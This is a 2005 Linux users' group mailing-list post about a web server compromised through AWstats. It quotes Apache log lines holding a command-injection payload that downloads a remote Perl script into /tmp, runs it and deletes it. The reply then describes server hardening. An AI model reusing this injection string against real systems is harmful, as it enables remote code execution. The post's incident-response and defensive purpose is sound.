[vox-tech] lugod.org cracked?

[Rick Moen]

Quoting Rod Roark (rod at sunsetsystems.com):

> I think I found the point of entry.  From the lugod.org
> apache log:
> 
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
> 65.2.252.155 - - [14/Feb/2005:19:31:37 -0800] "POST /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.commandt.org/a;perl%20a;%20rm%20a;ec
> ho%20;echo| HTTP/1.0" 200 525 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Host linuxmafia.com was likewise cracked on January 31, 2005, exactly
the same way, by some kiddie connecting from Brazil.  (I had everything
rebuilt with no lossage in 22 hours, but it was annoying.)

Personally, if I ever reinstall AWstats, it'll be to run it in batch
fashion to generate static pages, _not_ as a CGI -- and it's generally
wise to be suspicious of programmers' ability and inclination to
validate their input-data streams on public-facing apps.  (Remember, any
CGI on a public Web server that accepts input via GET or PUT, including
URL strings submitted via Web browser, is inherently obliged to parse
input data from the public Internet.)

Other changes I made on my site:

1.  I discovered to my horror that, despite staying current on PHP4
upgrades, the horrifically unwise "register_globals = On" setting from
some ancient, long-vanished PHP4 package had been retained, and I'd
never been warned about that (or noticed it on my own).  That got turn
off (in /etc/php4/apache/php.ini), in a hurry.

2.  While I was at it, I gave similar treatment to the allow_url_fopen
and file_uploads booleans in the same file.

3.  Also, since trusting users to use decent SSH passwords makes me
nervous, I disabled password authentication.  Not that people's RSA/DSA
private keys and passphrases can't be stolen, but it's a little harder,
at least.